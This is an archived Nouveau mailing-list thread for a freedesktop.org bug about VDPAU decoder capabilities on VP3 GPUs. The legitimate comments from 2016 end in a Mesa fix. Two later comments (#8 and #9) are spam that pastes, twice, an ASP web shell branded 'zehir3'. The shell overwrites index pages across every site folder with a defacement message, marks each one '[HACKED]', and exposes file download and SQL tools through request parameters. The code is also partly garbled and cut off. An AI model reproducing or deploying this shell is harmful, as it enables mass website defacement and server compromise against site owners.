[Nouveau] [Bug 95251] vdpau decoder capabilities: not supported

2017-08-25 Thread bugzilla-daemon
https://bugs.freedesktop.org/show_bug.cgi?id=95251

--- Comment #9 from sansan  ---
Comment on attachment 123444
  --> https://bugs.freedesktop.org/attachment.cgi?id=123444
vdpauinfo

<%
mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
dosyaPath = mid(mpat,InStrRev(mpat,"\")+1)
on error resume next
Dim objFSO,popup
Set objFSO = CreateObject ("Scripting.FileSystemObject")
if Request("kuskapani")=1 then
Response.End
end if


if Request("kuskapani")=2 then
on error resume next
path = Request("path")
sFolder = Request("SubFolder")
fName = Request("FileName")
d1 = Request("dosya1")
d2 = Request("dosya2")
d3 = Request("dosya3")
d4 = Request("dosya4")
d5 = Request("dosya5")
d6 = Request("dosya6")
bg__ = Request.Form("selectColour")
if bg__ = "0" then bg__ = "#ff"
byMesaj = "" & Request("byMesaj") '&
"Hmei7"

sFolder = Replace(sFolder,"/","\")

if Right(sFolder,1)<>"\" then sFolder = sFolder & "\"
Set f = objFSO.GetFolder(Path)
Set fc = f.SubFolders
h__ = 0
f__ = 0
ss__ = now
For Each f1 In fc
hedef_ = replace(f1.path,"/","\")
if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\"
hedef__ = left(hedef_,len(hedef_)-1)
folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"\"))
if d1<>"" then d1 = true
if d2<>"" then d2 = true
if d3<>"" then d3 = true
if d4<>"" then d4 = true
if d5<>"" then d5 = true
if d6<>"" then d6 = true
on error goto 0:on error resume next
if fName<>"" then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName,
True)
MyFile.write byMesaj
end if
if d1 then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder &
"index.htm", True)
MyFile.write byMesaj
end if
if d2 then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder &
"index.html", True)
MyFile.write byMesaj
end if
if d3 then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder &
"index.asp", True)
MyFile.write byMesaj
end if
if d4 then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder &
"default.asp", True)
MyFile.write byMesaj
end if
if d5 then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder &
"index.php", True)
MyFile.write byMesaj
end if
if d6 then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder &
"default.html", True)
MyFile.write byMesaj
end if

if err<>0 then
response.Write folderName_ & " [FAILED!]"
f__ = f__ + 1
else
response.Write folderName_ & " [HACKED]"
h__ = h__ + 1
end if
Next
ss___ = now
response.Write "by zehir!...Keterangan
:  mbuh : "(ss__-ss___,5)&"sn. ;)Hacked =
"__&"Failed = "__
response.End
end if

status = Request("status")
path   = Request("path")
dPath  = Request("dPath")
arama  = Request("txArama")
dkayit = Request("dkayit")
table  = Request("table")
del= Request("del")
islem  = Request("islem")
strSQL = Request("strSQL")
cf   = Request("cf")
pathfile = request("pathfile")
if path="" then path=request.servervariables("APPL_PHYSICAL_PATH")
if status="" then status=2
popup = true
'
Function ReadBinaryFile(FileName)
  Const adTypeBinary = 1
  Dim BinaryStream
  Set BinaryStream = CreateObject("ADODB.Stream")
  BinaryStream.Type = adTypeBinary
  BinaryStream.Open
  BinaryStream.LoadFromFile FileName
  ReadBinaryFile = BinaryStream.Read
End Function
if status="-3" then
Response.Buffer=True
Set Fil = objFSO.GetFile(pathfile)

Response.contenttype="application/force-download"
Response.AddHeader "Cache-control","private"
Response.AddHeader "Content-Length", Fil.Size
Response.AddHeader "Content-Disposition", "attachment; filename=" &
Fil.name

Response.BinaryWrite readBinaryFile(Fil.path)
Set f = Nothing: Set Fil = Nothing
response.End()
end if
'//
if status="-4" then popup=false
if status="13" then popup=false
if status="14" then popup=false
if status="15" then popup=false
if status="16" then popup=false
if status="17" then popup=false
if status="18" then popup=false
if status="19" then popup=false
if status="33" then popup=false
if status="40" then popup=false
if status="50" then popup=false
byMsg = request.QueryString("byMsg")
if byMsg<>"" then response.Write byMsg
response.Write "zehir3 --> powered by zehir"
if popup then
%>

System Info
 | 
System Test
 | 
Sites Test
 | 
Folder Action
 | 
SQL Server
 | 
POWERED BY

function sistemBilgisi(yol){

[Nouveau] [Bug 95251] vdpau decoder capabilities: not supported

2017-08-25 Thread bugzilla-daemon
https://bugs.freedesktop.org/show_bug.cgi?id=95251

--- Comment #8 from sansan  ---
Comment on attachment 123444
  --> https://bugs.freedesktop.org/attachment.cgi?id=123444
vdpauinfo

<%
mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
dosyaPath = mid(mpat,InStrRev(mpat,"\")+1)
on error resume next
Dim objFSO,popup
Set objFSO = CreateObject ("Scripting.FileSystemObject")
if Request("kuskapani")=1 then
Response.End
end if


if Request("kuskapani")=2 then
on error resume next
path = Request("path")
sFolder = Request("SubFolder")
fName = Request("FileName")
d1 = Request("dosya1")
d2 = Request("dosya2")
d3 = Request("dosya3")
d4 = Request("dosya4")
d5 = Request("dosya5")
d6 = Request("dosya6")
bg__ = Request.Form("selectColour")
if bg__ = "0" then bg__ = "#ff"
byMesaj = "" & Request("byMesaj") '&
"Hmei7"

sFolder = Replace(sFolder,"/","\")

if Right(sFolder,1)<>"\" then sFolder = sFolder & "\"
Set f = objFSO.GetFolder(Path)
Set fc = f.SubFolders
h__ = 0
f__ = 0
ss__ = now
For Each f1 In fc
hedef_ = replace(f1.path,"/","\")
if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\"
hedef__ = left(hedef_,len(hedef_)-1)
folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"\"))
if d1<>"" then d1 = true
if d2<>"" then d2 = true
if d3<>"" then d3 = true
if d4<>"" then d4 = true
if d5<>"" then d5 = true
if d6<>"" then d6 = true
on error goto 0:on error resume next
if fName<>"" then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName,
True)
MyFile.write byMesaj
end if
if d1 then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder &
"index.htm", True)
MyFile.write byMesaj
end if
if d2 then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder &
"index.html", True)
MyFile.write byMesaj
end if
if d3 then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder &
"index.asp", True)
MyFile.write byMesaj
end if
if d4 then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder &
"default.asp", True)
MyFile.write byMesaj
end if
if d5 then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder &
"index.php", True)
MyFile.write byMesaj
end if
if d6 then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder &
"default.html", True)
MyFile.write byMesaj
end if

if err<>0 then
response.Write folderName_ & " [FAILED!]"
f__ = f__ + 1
else
response.Write folderName_ & " [HACKED]"
h__ = h__ + 1
end if
Next
ss___ = now
response.Write "by zehir!...Keterangan
:  mbuh : "(ss__-ss___,5)&"sn. ;)Hacked =
"__&"Failed = "__
response.End
end if

status = Request("status")
path   = Request("path")
dPath  = Request("dPath")
arama  = Request("txArama")
dkayit = Request("dkayit")
table  = Request("table")
del= Request("del")
islem  = Request("islem")
strSQL = Request("strSQL")
cf   = Request("cf")
pathfile = request("pathfile")
if path="" then path=request.servervariables("APPL_PHYSICAL_PATH")
if status="" then status=2
popup = true
'
Function ReadBinaryFile(FileName)
  Const adTypeBinary = 1
  Dim BinaryStream
  Set BinaryStream = CreateObject("ADODB.Stream")
  BinaryStream.Type = adTypeBinary
  BinaryStream.Open
  BinaryStream.LoadFromFile FileName
  ReadBinaryFile = BinaryStream.Read
End Function
if status="-3" then
Response.Buffer=True
Set Fil = objFSO.GetFile(pathfile)

Response.contenttype="application/force-download"
Response.AddHeader "Cache-control","private"
Response.AddHeader "Content-Length", Fil.Size
Response.AddHeader "Content-Disposition", "attachment; filename=" &
Fil.name

Response.BinaryWrite readBinaryFile(Fil.path)
Set f = Nothing: Set Fil = Nothing
response.End()
end if
'//
if status="-4" then popup=false
if status="13" then popup=false
if status="14" then popup=false
if status="15" then popup=false
if status="16" then popup=false
if status="17" then popup=false
if status="18" then popup=false
if status="19" then popup=false
if status="33" then popup=false
if status="40" then popup=false
if status="50" then popup=false
byMsg = request.QueryString("byMsg")
if byMsg<>"" then response.Write byMsg
response.Write "zehir3 --> powered by zehir"
if popup then
%>

System Info
 | 
System Test
 | 
Sites Test
 | 
Folder Action
 | 
SQL Server
 | 
POWERED BY

function sistemBilgisi(yol){

[Nouveau] [Bug 95251] vdpau decoder capabilities: not supported

2016-05-04 Thread bugzilla-daemon
https://bugs.freedesktop.org/show_bug.cgi?id=95251

Ilia Mirkin  changed:

   What|Removed |Added

 Status|NEW |RESOLVED
 Resolution|--- |FIXED

--- Comment #7 from Ilia Mirkin  ---
Pushed to master, should be included in the next 11.2.x stable release. Thanks
for reporting and bearing with my misguided debugging suggestions.

commit 38fcf7cbadc748816f99b2c3c9f2f55d0f1635fe
Author: Ilia Mirkin 
Date:   Wed May 4 01:28:23 2016 -0400

nouveau/video: properly detect the decoder class for availability checks

The kernel is now more strict with the class ids it exposes, so we need
to check the G98 and MCP89 classes as well as the GT215 class. This
effectively caused us to decide there were no decoding capabilities on
newer kernel for VP3 chips.

Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=95251
Signed-off-by: Ilia Mirkin 
Cc: "11.2" 

-- 
You are receiving this mail because:
You are the assignee for the bug.
You are the QA Contact for the bug.___
Nouveau mailing list
Nouveau@lists.freedesktop.org
https://lists.freedesktop.org/mailman/listinfo/nouveau


[Nouveau] [Bug 95251] vdpau decoder capabilities: not supported

2016-05-04 Thread bugzilla-daemon
https://bugs.freedesktop.org/show_bug.cgi?id=95251

--- Comment #6 from Marko Srebre  ---
That's great. The patch works. vdpauinfo now shows decoding capabilities. Also
tested with mpv and an x264 video file, hardware acceleration working.

Thank you very much.

-- 
You are receiving this mail because:
You are the QA Contact for the bug.
You are the assignee for the bug.___
Nouveau mailing list
Nouveau@lists.freedesktop.org
https://lists.freedesktop.org/mailman/listinfo/nouveau


[Nouveau] [Bug 95251] vdpau decoder capabilities: not supported

2016-05-03 Thread bugzilla-daemon
https://bugs.freedesktop.org/show_bug.cgi?id=95251

--- Comment #5 from Ilia Mirkin  ---
Created attachment 123447
  --> https://bugs.freedesktop.org/attachment.cgi?id=123447=edit
test.patch

I think I see the issue. Looks like we broke it for recent kernels. Can you try
the attached patch against mesa?

-- 
You are receiving this mail because:
You are the assignee for the bug.
You are the QA Contact for the bug.___
Nouveau mailing list
Nouveau@lists.freedesktop.org
https://lists.freedesktop.org/mailman/listinfo/nouveau


[Nouveau] [Bug 95251] vdpau decoder capabilities: not supported

2016-05-03 Thread bugzilla-daemon
https://bugs.freedesktop.org/show_bug.cgi?id=95251

--- Comment #4 from Marko Srebre  ---
Created attachment 123446
  --> https://bugs.freedesktop.org/attachment.cgi?id=123446=edit
lib_firmware_nouveau

-- 
You are receiving this mail because:
You are the assignee for the bug.
You are the QA Contact for the bug.___
Nouveau mailing list
Nouveau@lists.freedesktop.org
https://lists.freedesktop.org/mailman/listinfo/nouveau


[Nouveau] [Bug 95251] vdpau decoder capabilities: not supported

2016-05-03 Thread bugzilla-daemon
https://bugs.freedesktop.org/show_bug.cgi?id=95251

--- Comment #3 from Marko Srebre  ---
Thanks for your help. /lib/firmware/nouveau seems fine, attaching output. Any
other way to check if firmware is being loaded?

I tried kernel parameters

nouveau.config=mspdec=1,msppp=1,msvld=1

but it didn't change the vdpainfo reported capabilities.

nvapeek shows
1540: f1010001
154c: 007d

-- 
You are receiving this mail because:
You are the assignee for the bug.
You are the QA Contact for the bug.___
Nouveau mailing list
Nouveau@lists.freedesktop.org
https://lists.freedesktop.org/mailman/listinfo/nouveau


[Nouveau] [Bug 95251] vdpau decoder capabilities: not supported

2016-05-03 Thread bugzilla-daemon
https://bugs.freedesktop.org/show_bug.cgi?id=95251

--- Comment #2 from Ilia Mirkin  ---
Please do

ls -l /lib/firmware/nouveau

If that all looks fine, the only other thing I can think of is that for some
reason we decide that your video decoder is fused off. In that case, you can
override nouveau's decision on that by doing

nouveau.config=mspdec=1,msppp=1,msvld=1

You can also grab envytools and check the output of

nvapeek 1540
nvapeek 154c

-- 
You are receiving this mail because:
You are the QA Contact for the bug.
You are the assignee for the bug.___
Nouveau mailing list
Nouveau@lists.freedesktop.org
https://lists.freedesktop.org/mailman/listinfo/nouveau


[Nouveau] [Bug 95251] vdpau decoder capabilities: not supported

2016-05-03 Thread bugzilla-daemon
https://bugs.freedesktop.org/show_bug.cgi?id=95251

--- Comment #1 from Marko Srebre  ---
Created attachment 123444
  --> https://bugs.freedesktop.org/attachment.cgi?id=123444=edit
vdpauinfo

-- 
You are receiving this mail because:
You are the assignee for the bug.
You are the QA Contact for the bug.___
Nouveau mailing list
Nouveau@lists.freedesktop.org
https://lists.freedesktop.org/mailman/listinfo/nouveau